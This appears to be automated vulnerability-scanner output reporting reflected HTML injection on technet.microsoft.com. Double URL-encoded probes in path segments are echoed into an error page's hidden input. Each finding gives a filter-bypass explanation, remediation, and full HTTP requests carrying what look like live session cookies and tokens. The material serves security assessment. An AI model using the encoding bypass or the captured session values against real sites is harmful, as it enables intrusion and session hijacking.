<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryd3256"><a>d1e3e5457a5/bb727034" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d33e%2522%253e%253ca%253e3804691eb5b was submitted in the REST URL parameter 3. This input was echoed as 7d33e"><a>3804691eb5b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727034.aspx7d33e%2522%253e%253ca%253e3804691eb5b HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:59:19 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727034.aspx7d33e"><a>3804691eb5b" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b156c%2522%253e%253ca%253e1956aeaa3db was submitted in the REST URL parameter 1. This input was echoed as b156c"><a>1956aeaa3db in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usb156c%2522%253e%253ca%253e1956aeaa3db/library/bb727042.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10201 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:21:55 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usb156c"><a>1956aeaa3db/library/bb727042" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e3a2%2522%253e%253ca%253e5fad658b774 was submitted in the REST URL parameter 2. This input was echoed as 8e3a2"><a>5fad658b774 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library8e3a2%2522%253e%253ca%253e5fad658b774/bb727042.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:22:48 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library8e3a2"><a>5fad658b774/bb727042" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ac93%2522%253e%253ca%253e62b42b496c3 was submitted in the REST URL parameter 3. This input was echoed as 6ac93"><a>62b42b496c3 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727042.aspx6ac93%2522%253e%253ca%253e62b42b496c3 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10210 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:23:27 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727042.aspx6ac93"><a>62b42b496c3" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 497f6%2522%253e%253ca%253ef63f4614f53 was submitted in the REST URL parameter 1. This input was echoed as 497f6"><a>f63f4614f53 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us497f6%2522%253e%253ca%253ef63f4614f53/library/bb727044.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10201 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:22:46 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us497f6"><a>f63f4614f53/library/bb727044" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a439%2522%253e%253ca%253ed85afdcabe5 was submitted in the REST URL parameter 2. This input was echoed as 1a439"><a>d85afdcabe5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library1a439%2522%253e%253ca%253ed85afdcabe5/bb727044.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 